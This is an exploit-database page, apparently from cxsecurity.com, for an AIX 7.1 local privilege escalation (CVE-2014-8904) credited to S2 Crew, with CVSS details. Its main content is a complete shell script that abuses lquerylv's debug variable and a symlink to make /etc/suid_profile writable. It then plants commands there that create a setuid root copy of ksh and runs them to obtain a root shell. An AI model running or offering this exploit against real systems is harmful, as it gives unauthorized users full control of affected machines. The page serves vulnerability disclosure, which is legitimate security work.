AIX 7.1 lquerylv privilege escalation

2015.10.31
Credit: S2 Crew
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/bin/sh # # Exploit Title: AIX 7.1 lquerylv privilege escalation # Date: 2015.10.30 # Exploit Author: S2 Crew [Hungary] # Vendor Homepage: www.ibm.com # Software Link: - # Version: - # Tested on: AIX 7.1 (7100-02-03-1334) # CVE : CVE-2014-8904 # # From file writing to command execution ;) # export _DBGCMD_LQUERYLV=1 umask 0 ln -s /etc/suid_profile /tmp/DEBUGCMD /usr/sbin/lquerylv cat << EOF >/etc/suid_profile cp /bin/ksh /tmp/r00tshell /usr/bin/syscall setreuid 0 0 chown root:system /tmp/r00tshell chmod 6755 /tmp/r00tshell EOF /opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid /tmp/r00tshell


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top